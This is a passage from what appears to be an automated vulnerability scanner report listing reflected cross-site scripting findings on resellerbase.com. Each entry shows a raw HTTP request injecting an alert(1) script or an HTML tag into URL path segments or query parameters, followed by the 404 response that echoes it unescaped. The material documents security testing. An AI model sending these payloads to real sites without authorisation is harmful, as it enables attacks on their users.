User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail17f8d<script>alert(1)</script>1141915b360/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1071. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd556<script>alert(1)</script>26d60d3c1e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12fd556<script>alert(1)</script>26d60d3c1e7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12fd556<script>alert(1)</script>26d60d3c1e7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1072. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5760f<script>alert(1)</script>96e852f202b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes5760f<script>alert(1)</script>96e852f202b/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes5760f<script>alert(1)</script>96e852f202b/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1073. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4197a<script>alert(1)</script>bddef9ac525 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos4197a<script>alert(1)</script>bddef9ac525/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos4197a<script>alert(1)</script>bddef9ac525/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1074. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload de7af<script>alert(1)</script>06a08444635 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/search.phpde7af<script>alert(1)</script>06a08444635?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/search.phpde7af<script>alert(1)</script>06a08444635?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1075. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 11c5c<a>e0e195ba547 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search11c5c<a>e0e195ba547&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search11c5c<a>e0e195ba547&opt=2 was not found on this server.</p>
...[SNIP]...

2.1076. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c6c08<a>1efed3a152f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/search.php?keyword=search...c6c08<a>1efed3a152f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/search.php?keyword=search...c6c08<a>1efed3a152f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1077. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 11b86<script>alert(1)</script>8c26d4a032e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&11b86<script>alert(1)</script>8c26d4a032e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&11b86<script>alert(1)</script>8c26d4a032e=1 was not found on this server.</p>
...[SNIP]...

2.1078. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b488f<a>ae4ec27c234 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2b488f<a>ae4ec27c234 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2b488f<a>ae4ec27c234 was not found on this server.</p>
...[SNIP]...

2.1079. http://www.resellerbase.com/detail/12/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload addb6<script>alert(1)</script>217d62ad892 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaddb6<script>alert(1)</script>217d62ad892/12/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaddb6<script>alert(1)</script>217d62ad892/12/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1080. http://www.resellerbase.com/detail/12/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91b2d<script>alert(1)</script>1d0f7322b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1291b2d<script>alert(1)</script>1d0f7322b7/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1291b2d<script>alert(1)</script>1d0f7322b7/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1081. http://www.resellerbase.com/detail/12/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e26ea<script>alert(1)</script>87d9186f5d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themese26ea<script>alert(1)</script>87d9186f5d1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themese26ea<script>alert(1)</script>87d9186f5d1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1082. http://www.resellerbase.com/detail/12/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63bbe<script>alert(1)</script>2860d9f4847 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/search.php63bbe<script>alert(1)</script>2860d9f4847?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/search.php63bbe<script>alert(1)</script>2860d9f4847?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1083. http://www.resellerbase.com/detail/12/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8ab43<a>67d35c71751 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/search.php?keyword=search...&Submit3=Search8ab43<a>67d35c71751&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/search.php?keyword=search...&Submit3=Search8ab43<a>67d35c71751&opt=2 was not found on this server.</p>
...[SNIP]...

2.1084. http://www.resellerbase.com/detail/12/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 19a6b<a>6a014446e98 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/search.php?keyword=search...19a6b<a>6a014446e98&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/search.php?keyword=search...19a6b<a>6a014446e98&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1085. http://www.resellerbase.com/detail/12/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3925c<script>alert(1)</script>95033d4e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=2&3925c<script>alert(1)</script>95033d4e58=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=2&3925c<script>alert(1)</script>95033d4e58=1 was not found on this server.</p>
...[SNIP]...

2.1086. http://www.resellerbase.com/detail/12/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5f62e<a>f762a445952 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=25f62e<a>f762a445952 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=25f62e<a>f762a445952 was not found on this server.</p>
...[SNIP]...

2.1087. http://www.resellerbase.com/detail/13/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ea25<script>alert(1)</script>85468de06d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5ea25<script>alert(1)</script>85468de06d4/13/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5ea25<script>alert(1)</script>85468de06d4/13/ was not found on this server.</p>
...[SNIP]...

2.1088. http://www.resellerbase.com/detail/13/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c49d<script>alert(1)</script>5f7335e068d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/131c49d<script>alert(1)</script>5f7335e068d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
